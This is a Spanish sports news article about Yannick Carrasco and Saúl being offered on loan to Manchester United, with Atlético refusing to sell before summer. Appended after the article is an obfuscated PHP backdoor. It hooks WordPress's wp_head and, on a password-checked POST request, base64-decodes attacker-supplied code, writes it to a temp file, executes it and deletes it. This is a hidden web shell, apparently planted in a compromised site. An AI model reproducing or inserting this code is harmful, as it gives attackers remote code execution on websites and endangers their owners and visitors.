Carrasco y Saúl se ofrecen al United

El equipo británico busca un centrocampista y, según The Telegraph, los representantes del belga han iniciado contactos para una cesión. La agencia de Saúl también le ha ofrecido, pero sin éxito.

El nombre de Yannick Carrasco vuelve a salir a escena en la recta final de una ventana de fichajes. En esta ocasión, vinculado al Manchester United. El equipo británico busca contra reloj un centrocampista que ocupe el lugar del lesionado Eriksen y, según informa The Telegraph, los representantes del belga han contactado con Old Trafford para ofrecer al jugador. Al United le encaja, a pesar de no ser del mismo perfil del danés. No obstante, el Atlético no tiene intención de dejarlo salir ahora.

El Barça tiene una opción de compra para fichar a Carrasco en verano. Pero esto no supondría un obstáculo, pues el United solo busca una cesión para lo que resta de temporada. De hecho, también hubo conversaciones para que el belga vistiera de azulgrana desde ya mismo. Pero el Atlético lo considera un futbolista válido y necesario para el segundo tramo de la Liga. En verano, la situación será diferente y Carrasco tiene la puerta abierta para salir.

El internacional belga transmitió al club y al cuerpo técnico su intención de estar comprometido mientras vistiera de rojiblanco. Aun así, su agente, Pini Zahavi, habló hace dos semanas de la posibilidad de que su futbolista se fuera ya mismo al Camp Nou en la operación Memphis y que al propio Yannick le seducía la idea. Ahora, los contactos han sido con el United, aunque parece aún más complicado pues, además, el mercado está a punto de cerrar.

Hace un año, en el anterior mercado de invierno, Carrasco ya recibió propuestas sobre la bocina desde Inglaterra. Y en verano también, pero el Atlético se ciñó a la cláusula de rescisión de 60 millones del jugador. En esta ocasión, el club rojiblanco cierra la puerta hasta el verano. Entonces, se reactivará el culebrón, con el Barça como parte implicada.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}